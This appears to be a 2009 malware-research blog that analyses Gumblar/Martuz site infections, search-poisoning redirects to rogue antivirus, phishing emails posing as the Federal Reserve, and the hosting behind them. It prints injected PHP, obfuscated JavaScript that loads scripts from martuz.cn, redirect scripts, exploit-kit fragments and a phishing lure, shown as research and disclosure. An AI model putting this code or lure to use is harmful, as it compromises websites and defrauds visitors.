Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 31 May 2009

PC-pwning infection hits 30,000 legit websites

A nasty infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday.

The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot.

The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor's machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software.

Read more

Friday, 29 May 2009

Full Circle Magazine: Issue 25!

This month, we’ve got some awesome stuff coming your way, including a copy of Beginning OpenOffice 3 up for grabs by one of you!

Stuff this month:

- Command and Conquer - Shell History.
- How To: Test Drive VirtualBox, Increase Game Speed In X, and Inkscape - Part 2.
- My Story - Why I Converted To Linux.
- My Opinion - First Experiences With Kubuntu
- Book Review - Beginning OpenOffice 3, one copy up for grabs!
- MOTU Interview - Guillaume Martres
- Top 5 - Games You’ve Never Heard Of.
- PLUS: all the usual goodness!

Read more

Get it while it's hot!

Issues 0 - Current



hpHosts - UPDATED May 29th, 2009

hpHosts - UPDATED May 29th, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 62,446 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 29/05/2009 13:30
  2. Last Verified: 29/05/2009 12:00

Download hpHosts now!

I am also happy to announce, after a complete overhaul and manual conversion, the hpHosts forums are now back online. Sadly, user accounts were not saved, so you'll need to re-register.

Saturday, 23 May 2009

Oh Comodo here we go again!

Comodo states: "To get a DV cert all you need is a domain name and $15..and no background check about your identity is required." As I stated in a previous post ... perhaps you should at least check the domain name ... duh! that would be a good first clue ... but I guess the $15 is more important?

These culprits were first reported on Thursday, April 16, 2009 - A Diverse Portfolio of Fake Security Software - Part Nineteen and later by the SunBelt blog where both these domains reside on the same IP (iSystem Inc.)

Seems iSystem Inc also controls several other (malicious) domains ... including "malwarecatcher. net" which is associated with "updvms. net" and this is where it get interesting ...

Read more

Friday, 22 May 2009 (aka Gumblar) and WordPress does not a good mix make ....

I spent a couple of hours last night (it's now 01:07 here) cleaning up someones WordPress based site after it became infected with the now very publicized Gumblar/Martuz infection. A quick look at the files, showed the infection to only be present in a few of the files, but the file locations varied.

For example, in wp-config.php we see (formatted for readability);

function tmp_lkojfghx($s)
if(preg_match_all('#$lt;script(.*?)$lt;/script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
$s1=preg_replace('#$lt;script language=javascript>$lt;!-- \n\(function\(.+?\n -->$lt;/script>#','',$s);
return $g?gzencode($s):$s;
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);
echo $s[$i][1];

That lovely bit of Base64 code you see above, decodes to;

<script language=javascript><!--
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);

This is what you'll see in all of the .js files (the mumrik theme for example, has 5 .js files, and every single one of them contained the above), and it decodes to;

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+""+j+"><\/script>");}

However, with the exception of the wp-config.php file, the only affected files for the code containing the Base64 rubbish, were the index.php files (across the entire WordPress system, including all themes), but plugins were unaffected, as was the wp-admin directory?

Finally of course, we had the obligatory gifimg.php file. Again however, there was only one in this particular case, and it was located in the exec-php/images/ directory. This contained yet another Base64 encoded script, that decoded to;


Presumably this receives POST data from the attackers server and/or the attackers themselves. Though I'd love to get hold of both the tools or such, used to do the actual infection itself, aswell as finding out what is actually contained in the POST request referenced in these scripts.

Needless to say of course, if your site does become affected by this, you'll find it far quicker and far easier, to just wipe the files and restore a clean backup (you do frequently backup your sites files - don't you?), and of course, though this should be blatantly obvious, STOP using basic passwords - they're not doing you any good (and yes, I know it's because they're easy to remember). If you are affected by this, or your website/server is affected by a different infection, and you need help cleaning it up, pop over to the Malware Domain List forums;

Updates, delays, and a new laptop!

Time is a precious commodity, and one which should be spent wisely - something I'm not very good at (I'm easily side tracked).

You'll no doubt have noticed that the hpHosts release is way over due, and this is true, but I've got a good excuse - really I have. Although a week over due, I'm hoping to get the next release out by Tuesday.

On a more positive note, I've made a few changes to the hpHosts website in an attempt to clean it up and speed it up a little. I'm not going to tell you what they are - I'll see if you notice ;o)

On yet another positive note, thanks to an extremely generous donation from an anonymous source, I was finally able to get myself a new laptop to replace the old and dying Toshiba Satellite Pro 4200. The laptop I went with, was a Toshiba Satellite L300-1DN, 3GB Ram, 250GB HDD etc etc, and Windows Vista Home Premium.

Let me just say though, after the last couple of days, whilst I love Toshiba's hardware - I detest their staff. I called them yet again today to ask them to send me the original Windows CD that goes with the licence for this laptop - they refused, telling me they weren't obligated to do so (claiming all they were obligated to do as far as the Microsoft OEM agreement goes, was to provide means to restore the system - which they did, via a program I had to use, to create my own restoration DVD's). Not satisfied with this, I informed them of the OEM agreement, and the fact it mentions the OEM must provide the original CD - something I had Microsoft themselves clarify when I called them earlier today.

Toshiba however, don't think this is true - they told me Microsoft was wrong (err guys - it's THEIR OS and THEIR agreement - I'm pretty sure they'll know it a bit better than you do). Needless to say, I'm apparently not getting the original CD that goes with this machine, so am slightly miffed (even more so given they charge for the restoration CD's that they used to give out (still got the one that goes with the old laptop)), and won't be getting anything else from them in the future, nor recommending anyone else do so. I can't actually seem to find the agreement I came across last time that referred to OEM's being required to give the CoA label itself, the documentation, and the original Windows CD itself, the information on the following page is the closest I could find;

As far as the laptop itself is concerned, I've sorted out most of the issues that came up, such as problems with the development environment (wasn't Vista compatible, so had to be installed using a series of work-arounds), and removed all of the garbage that came with it (oh and Google - if you're going to force installation of stuff, at least provide a means of uninstalling it (specifically, the GoogleEULALauncher, that is NOT uninstalled when ditching Picasa and Google Desktop)), and am very happy with it so far :o)

Thursday, 21 May 2009

Interforum LTD - Another Russian blackhat outfit

Interforum LTD are yet another Russian based blackhat outfit, involved in various activities, just one of which is rogue infections via Google poisoning.

This particular one starts at (IP: - with a URL that instantly screams "I'm gonna infect you, but I gots some really cool porn for you!";


Viewing the source code, shows us several rather interesting links;
hxxp:// (VirusTotal results)

I checked the tube.gif file, and the .js/.css files hosted on the GoogleCode URL, but couldn't see anything malicious, so is likely still in development.

So what does the URL actually look like? Well a WordPress blog actually. Though it also includes one of our very familiar looking "Woops, ya need a codec/flass to view this";

Clicking on this "video" results in our being take through (IP: - Real International Business Corp. - known malware block), and given a fake flash installer, identified as PrivacyCenter by NOD32 (quarantined it when I tried obtaining a copy);

This file is downloaded from;

Hint: promo1 is also valid as promo2/3 and the vname seems to be anything you like - it's just used as the name of the .exe to be downloaded
The IP, is shared by over 20 other malicious domains, including;


Net-block information for 91.212.132.*

inetnum: -
netname: Interforum-NET
descr: Interforum LTD
country: RS
org: ORG-IL161-RIPE
admin-c: SS11684-RIPE
tech-c: SS11684-RIPE
mnt-by: MNT-INTF
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: MNT-INTF
mnt-domains: MNT-INTF
source: RIPE # Filtered

organisation: ORG-IL161-RIPE
org-name: Interforum LTD
org-type: OTHER
address: 152155, Yaroslavskaya dist., Rostov, Lenin st. 34, Russia
mnt-ref: MNT-INTF
mnt-by: MNT-INTF
source: RIPE # Filtered

person: Sevrem Sofiev
address: SARAJEVSKA 37 11000 BELGRADE
phone: +381 11 313 2848
nic-hdl: SS11684-RIPE
mnt-by: MNT-INTF
source: RIPE # Filtered

:: Information related to ''

descr: INTF route
origin: AS49091
mnt-by: MNT-INTF
source: RIPE # Filtered

This block also appears to be directly related (see parent: 91.212.) to the group I blogged about, that are also involved in the poisoning (not really surprising) and blogged by Danchev earlier this week;

What is more interesting, is that one of the domains reported to me as being hacked, (IP: -, also suggests a possible relation to the group(s) responsible for the exploitation of the sites hosted by Lunarpages (and yes, those previously reported, are STILL carrying the malicious code - nice going there LunarPages!).


Ref: goes public!

It is with great pleasure that I announce the public opening of, a site created by my good friend Anthony, who also runs the Malware Web Threats blog. is a site much like Malware Domain List, in that it provides information on threats currently in the wild, and their associated IP's, ASN's and what not.

MalwareURL currently provides for researchers to find information based on a multitude of different needs, such as IP, domain name, ASN, registrant. For example, if we wanted to find domains involved in the poisoning I blogged about yesterday, we could simply pop over to MalwareURL, and enter the domain or IP involved;

This provides us with a list of the domains associated with the IP assigned to, a known rogue infection vector. If we click on Details, we see yet more information on this, such as the malicious URL's known to be available on the domains and the sites known to redirect to such, for example;

Anthony is still polishing the site, but so far, it's showing to be yet another excellent resource for researchers in the malware field. Take a ride over, and let him know what you think!


Wednesday, 20 May 2009 poisoning - Gumblar/Martuz isn't the only infection around .....

I've just had an e-mail from a friend, with the subject "Gumblar gets all the attention, but the other guys are still busy too", and he couldn't be more right - the recent spate of Gumblar/Martuz infections are garnering all of the press coverage, with the rest going relatively ignored - well I won't stand for that. There's more than one infection going around, and this particular one involves not Google poisoning - but Live poisoning (Live for those folks unaware, is Microsofts search engine).

The query was for nothing more nefarious than a cupcake recipe, and the infected domain,, a hacked participant.

If we look at the source code, we immediately notice the following;

<script language=javascript>window.location=encodeURI(""+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX"); </script>
<img src="1.jpg" height="100%" width="100%">

Following this URL sends us through a couple of redirects, with the final destination apparently varying. I didn't record the first time I followed it, but the report I received showed the following;


The second time I followed this, in order to document it for you fine folks, I was finally taken from through;


Now I'm not saying they're paranoid but, apparently these fine folks want to ensure you're using Flash, presumably, to make it more difficult to automate analysis (like that's going to work);

function download()
// window.location='download.php?affid=02086';
window.document.getElementById('download').innerHTML="<embed src='load.swf?&p=0&t=_self&u=download.php?affid=02086' autostart=true width=1 height=1></embed>";

Note the "// " before window.location? This means the site previously used Javascript for the redirect ("//" is the Javascript and PHP "disable this line" tag).

So what does this give us? Why a lovely roguerific piece of crapness called System Security Antivirus (WinWebSecurity variant) of course!


Which gives us a lovely little file called install.exe (482K - MD5: e8bba2fc1c2f1a89ad73bc897b424e65)

Result: 6/40 (15.00%)

Domains involved: -,, -, - - -

Net-blocks involved (recognize them?)

inetnum: -
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: RU
org: ORG-LA208-RIPE
admin-c: RM2628-RIPE
tech-c: RM2628-RIPE
mnt-lower: RIPE-NCC-HM-PI-MNT
source: RIPE # Filtered

organisation: ORG-LA208-RIPE
org-name: LLC "Gaztransitstroyinfo"
phone: +7-921-2238843
org-type: OTHER
address: Russia, Sankt Peterburg, Kropotkina 1, office 299
source: RIPE # Filtered

person: Roman Matveev
address: Russia, Sankt Peterburg, Kropotkina 1, off. 299
phone: +7-921-2238843
nic-hdl: RM2628-RIPE
source: RIPE # Filtered

:: Information related to ''

origin: as29371
source: RIPE # Filtered

OrgName: Netelligent Hosting Services Inc.
OrgID: NHS-31
Address: 1396 Franklin Drive
City: Laval
StateProv: QC
PostalCode: H7W-1K6
Country: CA

NetRange: -
NetHandle: NET-209-44-96-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-08-01
Updated: 2007-03-20

RTechHandle: NETEL1-ARIN
RTechName: Netelligent Ops
RTechPhone: +1-514-369-2209

OrgAbuseHandle: NETEL2-ARIN
OrgAbuseName: Netelligent Abuse
OrgAbusePhone: +1-514-369-2209

OrgTechHandle: NETEL1-ARIN
OrgTechName: Netelligent Ops
OrgTechPhone: +1-514-369-2209

# ARIN WHOIS database, last updated 2009-03-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database

inetnum: -
netname: Real_Host_NET1
descr: Real Host
country: LV
admin-c: DB8712-RIPE
tech-c: DB8712-RIPE
mnt-by: AS8206-MNT
source: RIPE # Filtered

person: Danila Berencev
address: Kazakhstan, Almaty , Abay street 2a
phone: + 87771697576
nic-hdl: DB8712-RIPE
source: RIPE # Filtered

:: Information related to ''

descr: JUNIK Riga Network part 2
origin: AS8206
mnt-by: AS8206-MNT
source: RIPE # Filtered

Follow the Bouncing Malware: Gone With the WINS - Part II

Imagine, if you will, that you're the newest contestant on the latest reality-tv show, Idle American Apprentice to the Dancing Bachelorette Stars. Like all good reality shows (now there's an oxymoron...), you have the opportunity to "earn" your way to be safe from elimination (you know, that time of the evening when the grumpy, scowling dude with the bad comb-over says "You're Fired"®), if you can manage to "win" some sort of utterly contrived daily "challenge."

And, oh, what a challenge it is!

You're teamed up with a partner, who is blindfolded, given a cell phone, and driven to your home. After being spun around a few dozen times to mess with their sense of direction (and really, who doesn't like seeing dizzy, stressed-out people in blindfolds stumbling around in unfamiliar surroundings? Heck, that's how the missus and I spend many a Friday evening... uh... um... nevermind...) they're placed in some random room of your home. Using only the cell phone, you need to be the first contestant to somehow direct them to find the kitchen and make your pouty-lipped, rail-thin bachelorette a peanut-butter 'n' jelly sammich.

So, what do you do?

Obviously, before anyone will be slappin' Smuckers and Skippy on bread, there's going to need to be a whole lot o'back-and-forth on the phone-- first, as you try to figure out where they are, and then as you try to tell them how to get where they need to be. Remember, they can't see because they're blindfolded, so you'll need to rely on all of their other senses. You might start by asking them whether there is carpet on the floor, whether they hear the ticking of a clock... you might ask them to slowly walk around the room and to tell you what the furniture they find in the room feels like, etc... etc... The idea is, you have to start by trying to somehow figure out their location. Once you know where they are, then you can start to giving them some broad direction: "First, face the couch... then turn left. Walk forward until you get to the wall, and then move along it to your left until you find the door. Go out through the door and turn left..." Then, as you navigate them into the kitchen, you'll get increasingly specific: "open the third cupboard door to the left of the stove, the peanut butter is on the second shelf..."

Read the full article


For those that have not yet read the FTBM series, below are links to each edition.

FTBM - Part I -
FTBM - Part II -
FTBM - Part III -
FTBM - Part IV -
FTBM - Part V -
FTBM - Part VI -
FTBM - Part VII -
FTBM - Part VIII -
FTBM - Part IX -
FTBM - Part IX -
FTBM - Part XI -

Tom's website

The Tom Liston Fanclub

Monday, 18 May 2009 switches to ( - netname: NET-VENTREX)

Following on from the reent spate of infections, we find the malthors have switched to using has been inactive for a while now, first resulting in the router at DataHop, UK (, returning "destination net unavailable" that left it dead, then failing to resolve completely, and now pointing to (California Regional Intranet, Inc.), which results in it's failing to load completely. Incidentally, there's 4 domains resolving to this IP at present.

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain - martuz .cn (95 .129 .145 .58)

The script

(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

The script looks and acts the same as the gumblar script. All facts we know about the Gumblar apply to Martuz as well. And the removal instructions should be the same.

Read more

References is infected? - -

Saturday, 16 May 2009

Comodo one of the good guys?

Are Comodo one of the good guys? Err no - not anymore they aren't - they're now officially (still) supporting the bad guys, as Mike Burgess (MS MVP, and MS MVP Hosts provider) explains;

"" is hosted on the same IP as the following and all the downloads are detected as Win32/Adware.CoreguardAntivirus
coreguard-antivirus. com
guardlab2009. biz
guardlab2009. net
guardlab2009. com (Google Diagnostic report)

Some of the others on the above list are using:
fullguardlab. com
== Server Certificate ==========
CN=fullguardlab. com, OU=Free SSL, OU=Hosted by LiderTelecom LTD, OU=Domain Control Validated
CN=EssentialSSL CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
[Serial Number]

bitcoreguard. com
== Server Certificate ==========
CN=fullguardlab. com, OU=Free SSL, OU=Hosted by LiderTelecom LTD, OU=Domain Control Validated
CN=EssentialSSL CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
[Serial Number]

So this got me to thinking ... a while back (04-21-09) I reported to Comodo via their secret address a list of sites distributing malicious software ... although I never received a reply as I did when I reported "Conficker systems being updated with SpywareProtect2009" which Comodo had issued a certificate to.

Anyway ... I went back and checked the sites I last reported and it seems Comodo has decided to ignore my report ...

rapid-antivir-2009. com
rapid-antivir2009. com
rapid-antivirus2009. com = all redirect to:

Read more

Kudos to Donna for the heads up!, who wrote;

All I can say is Comodo products need NO support at all. If they continue to earn money from this malware/rogue authors by issuing certificate or if their free certificates give them “popularity” (to attract potential paying customers) then how is the fight against rogue/malware will succeed if a known security vendor will do that?

Which is why CoU and LandzDown stop posting updates information on Comodo Internet Security Suite/Free firewall because Comodo, Symantec, Webroot, StopZilla and BitDefender and ZoneLabs have partner with that, which as we all know… unwanted and questionable company for continue to push/hosts spyware/adware stuff using different domains or part of their business.

Read more

Thursday, 14 May 2009

Google poisoning, IST, rogues and 250+ reasons to avoid 209.44.* ......

Following on from the IST (Internet Service Team) and their blackhat SEO involving Google, we've got yet another example of Google poisoning, this time from Netelligent Hosting Services Inc and going via SteepHost and Layered Tech.

Unlike the previous one, that contained the script directly, this one contains random rubbish on the site itself, but loads a file called script.js;

vURL Online - Dissect -

script.js is pretty much the same as the last one, in that it checks the referer, and ONLY redirects to the malware, if you've come from a search engine result;

vURL Desktop Edition v0.3.7 Results
Source code for:
Server IP: [ ]
hpHosts Status: Listed [ Class: EMD ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 01:58:33:58
var Ref=document.referrer;

document.write('<form id="go" method=POST action="h' + 't' + 't' + 'p://zod' + '' + 'search.php?q=test+file+and+windows+defender'+'&seref='+encodeURIComponent(document.referrer)+'&ref='+encodeURIComponent(document.URL)+'" style=display:none></form>');
document.write('<form id="go2" method=get action="h' + 't' + 't' + 'p://goo' + ''+'" style=display:none></form>);
function pr(sSearch)
f = document.getElementById("go");
function goog()
f = document.getElementById("go2");

if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.msn.')!=-1 || Ref.indexOf('.live.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('.aol.')!=-1 || Ref.indexOf('search')!=-1 || Ref.indexOf('.ask.')!=-1 || Ref.indexOf('.altavista.')!=-1)

If you've NOT come from a search engine result, you're taken directly to

vURL Online - Dissect -

If however, you've come from a search engine such as Google, you're taken instead, via ( to (;

POST /search.php?q=test+file+and+windows+defender& HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/, application/xaml+xml, */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Length: 0
Connection: Keep-Alive
Pragma: no-cache
Cookie: s=0

HTTP/1.1 302 Found
Date: Fri, 15 May 2009 06:07:17 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/4.4.7 FrontPage/
X-Powered-By: PHP/4.4.7
Set-Cookie: s=1; expires=Fri, 15 May 2009 07:07:17 GMT
Keep-Alive: timeout=4, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

GET /page2.php?id=64 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/, application/msword, application/x-silverlight, application/x-ms-application, application/x-ms-xbap, application/, application/xaml+xml, */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Avant Browser; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 302 Found
Date: Fri, 15 May 2009 01:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
location: index.php?c=0&e=0&affid=08064
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

Where you're presented with the following scare tactics;

Unfortunately, 99% of you have Javascript and ActiveX enabled so you can see those lovely little flash movies, so instead of just seeing a yellow bar mentioning an ActiveX being unable to run, you're going to have the site automagically download it's crap from;

install.exe - MD5: 924393ff9b991829ade66d9fe21bc29f


This package is 466KB of roguerific goodness called System Security 2009, and is a WinWebSecurity variant. This particular variant, is currently only detected by a-Squared (Trojan.Win32.Winwebsec!IK), Malwarebytes Anti-Malware, BitDefender (Gen:Trojan.Heur.HY.D1827D7D7D) and Ikarus (Trojan.Win32.Winwebsec)., like all of the rest, shares it's IP address, with a whole host of rogueified goodness, including;

Sadly, Anubis doesn't seem to be feeling too well at the moment, as it errored out when I tried submitting the file to it, so I submitted it to JoeBox and ThreatExpert instead. The Threat Expert report is referenced above, but JoeBox haven't gotten back to me yet, so I'll post that when it comes through.

In the meantime, feel free to go have a shout at the hosting companies providing the hosting for this rubbish.

FoxIt Reader officially malware!

I am saddened to report, recent behaviour by the FoxIt Reader developers, has shown they'd rather turn FoxIt into malware, to gain a few quid, than continuing to offer a viable alternative to Adobe Reader.

Because of this, FoxIt's sites will now be added to hpHosts with the EMD classification, as the behaviour documented by Paperghost, is the behaviour we expect from malware - NOT from legit applications.

Like many people, I've been digging around for alternatives to Adobe Reader in the wake of all those wonderful exploit related stories in the press recently.

Well, I'd heard Foxit mentioned quite a few times so off I went in search of fox-related goodness.

In case you haven't guessed, IT'S ALL ABOUT TO GO HORRIBLY WRONG.

See, here's the deal - if at any point during the install I see something I don't like, then I'm going to look for the escape route. You better provide me with an escape route, or I'm going to complain about you on the Internet.

Read more

/edit 15-05-2009 13:37

I've just re-ran the FoxIt installer as the last time I checked the installer for the latest version, it installed the toolbar regardless and I wanted to post a video of this behaviour, this time it didn't - it took notice of my unchecking the boxes for the toolbar, homepage and eBay rubbish, and didn't install them.

A Diverse Portfolio of Fake Security Software - Part Twenty

Has the cloudy economic climate hit the scareware business model, the single most efficient and high-liquidity monetization practice that's driving the majority of blackhat SEO and malware attacks? The affiliate networks are either experiencing a slow Q2, or are basically experimenting with profit optimization strategies.

Following the "aggressive" piece of scareware with elements of ransomware discovered in March, a new version of the rogue security software is once again holding an infected system's assets hostage until a license is purchased.

This tactic is however a great example of the dynamics of underground ecosystem (The Dynamics of the Malware Industry - Proprietary Malware Tools; The Underground Economy's Supply of Goods; 76Service - Cybercrime as a Service Going Mainstream; Zeus Crimeware as a Service Going Mainstream; Will Code Malware for Financial Incentives; The Cost of Anonymizing a Cybercriminal's Internet Activities - Part Two; Using Market Forces to Disrupt Botnets; E-crime and Socioeconomic Factors; Price Discrimination in the Market for Stolen Credit Cards; Are Stolen Credit Card Details Getting Cheaper?).

Despite the fact that it's the network of cybercriminals that pays and motivates other cybercriminals to SQL inject legitimate sites, send spam, embedd malicious code through compromised accounts and launch blackhat SEO campaigns, it cannot exist without the traffic that they provide, and is therefore competing with other affiliate networks for it.

Read more

Kudos to TeMerc for the heads up!

Wednesday, 13 May 2009

Spambot Search Tool v0.30

Version: 0.30

* Fixed LogSpammerToFile function (I forgot to replace $savetofolder with $sLogPath when moving it to a function)
+ Added extra error handling for cases where file_get_contents is enabled, but allow_url_fopen is disabled

* Modified view_spammers.php (line 27 & 31) to show the MySQL error being displayed;

* Moved more messages into en.php
* Cleaned up HTML in check_spammers.php
* Few other minor code changes


Tuesday, 12 May 2009

Federal Reserve goes LuckySploit

I've received several e-mails today, claiming to be from the Federal Reserve - funny considering I'm not in the US. Usually I just forward them to PhishTank and the appropriate authorities/hosting co's, and file it away. This one however, got me interested because I noticed a relation - remember this?.

The story referred to at the ISC, references an issue with a multitude of sites hosted by LunarPages, being hacked and containing exploits (the sites at LunarPages are still carrying the exploits btw). This time they obviously decided to go via e-mail and use their own sites instead.

The e-mail itself, contains the following content;



You're getting this letter in connection with new directions issued by U.S. Treasury Department. The directions concern U.S. Federal Wire online payments.

A country-wide phishing attack began on May 6, 2009. It's taking place hitherto. Therefore a great number of banks and credit unions is affected by this attack and quantity of illegal wire transfers has reached an extremely high level.

U.S. Treasury Department, Federal Reserve and Federal Deposit Insurance Corporation (FDIC) in common worked out a complex of immediate actions for the highest possible reduction of fraudulent operations. We regret to inform you that definite restrictions will be applied to all Federal Wire transfers from May 12 till May 25.

Here you can get more detailed information regarding the affected banks and U.S. Treasury Department restrictions:


Federal Reserve Bank System Administration

The only difference between the 3 e-mails I've received, are the "from" addresses (all faked of course), the subject lines, and the domains they point to - all of which are on the same IP, (netname: UNICOM-GD). The subjects I've seen thus far are;

Attention - Important Customer Notification
Important: Federal Reserve Bank!
Corporate Cusomers - Please read carefully

The e-mail headers for the e-mails, indicate the following as the origins; ( ( (

I did some research when I first received the e-mail, on the domain itself, and found a plethora of domains, all of which are being used for the same purposes and all of which are on the same IP,;

The domains they are associated with are, and - all of which are involved in malicious activity.

The "Federal" domains, all load an iFrame to another file in the same server, which contains;

function alteri(crust)
vera=new crust()
function infert(myrtum,whip)
function pergit(iram,clavum)
function labet(lernae,dunny)
function watson(bail)
function stygio(virgam)
function larry(lernae)
function imitat(iussos)
function tangis(pindan,verum,fovet,arcent)
return (2.856e3,adnare)
function amem(pascua,saltus,iubet,mall)
var caeso;
uates=(1e0<=125?molem:8.308e3)((7,''+'x'),(intexo,tangit+'r'+'e'+'t'+'u'+'r'+oreque+' '+dira+dolori+tangit)+(7.8e1>=vestit?6427:'peo')+(0.2107,tangit+lituo+'('+'x'+')'+tangit));
nescio=(veho>8.356e3?6e0:molem)(("160"<=2.6e1?3.3e1:'r'+'et'+'urn'+' ne'+'w '+'X'+tangit)+(0.9,'MLH')+(5.7e1,'ttpR')+(9e0>=77?1.47e2:curiis+'t()'));
spell=(9.4e1>=8.4e1?molem:96)((.3947,''+'r'+'e'+'t'+'u'+'r'+'n'+' '+'X'+tangit)+("2867." if(!(5.807e3,caeso)&&((5.35e2<=1?9.8e1:uates)((6745>2e0?spell:8.1e1)()))!=(18,'un'+'def'+osque+'d'))
return (62.,caeso)
poscitjie=new (.3,styxeez)();
lenis=(18.,molem)((996,tangit+'r'+obero+dira+'')+(0.8165,''+'u'+'r'+oreque+' '+tangit)+(97.,tangit+'tenebo()'));
opinoreea=(3.37e2,molem)((".62"<=227?'x':5),(cynthi>.1150?dolori:.17),(123,'ret')+(2682.<='742'?6e0:'ur'+'n ')+('.72'<=8861?'t'+'imens(x,'+'y)':27.));
audeatqqa=(1.39e2,molem)((4134.,'x'),(6>1930?ordine:tangit+'r'+obero+'t'+tangit)+(.5881,'urn ')+(36,''+speque+'y'+'r'+dira+mento+'s'+'('+'x'+')'+tangit));
function syrtis(tractu,excepi,foedas,ventus)
var datis=(64<'8222'?lenis:9117)();
function remus(pindan,ratty,sueba,mater)
var audiat=ramumuuz["floor"](ramumuuz["random"]()*pindan[dirty]);
function miner(verum,pindan,volvet,tenus)
function araque(pindan,verum,tenus,serua)
return volvet
function meos(nervis,obvius,peius,tullo)
var sciat=(34,tangit);
var adnare;
var lippie;
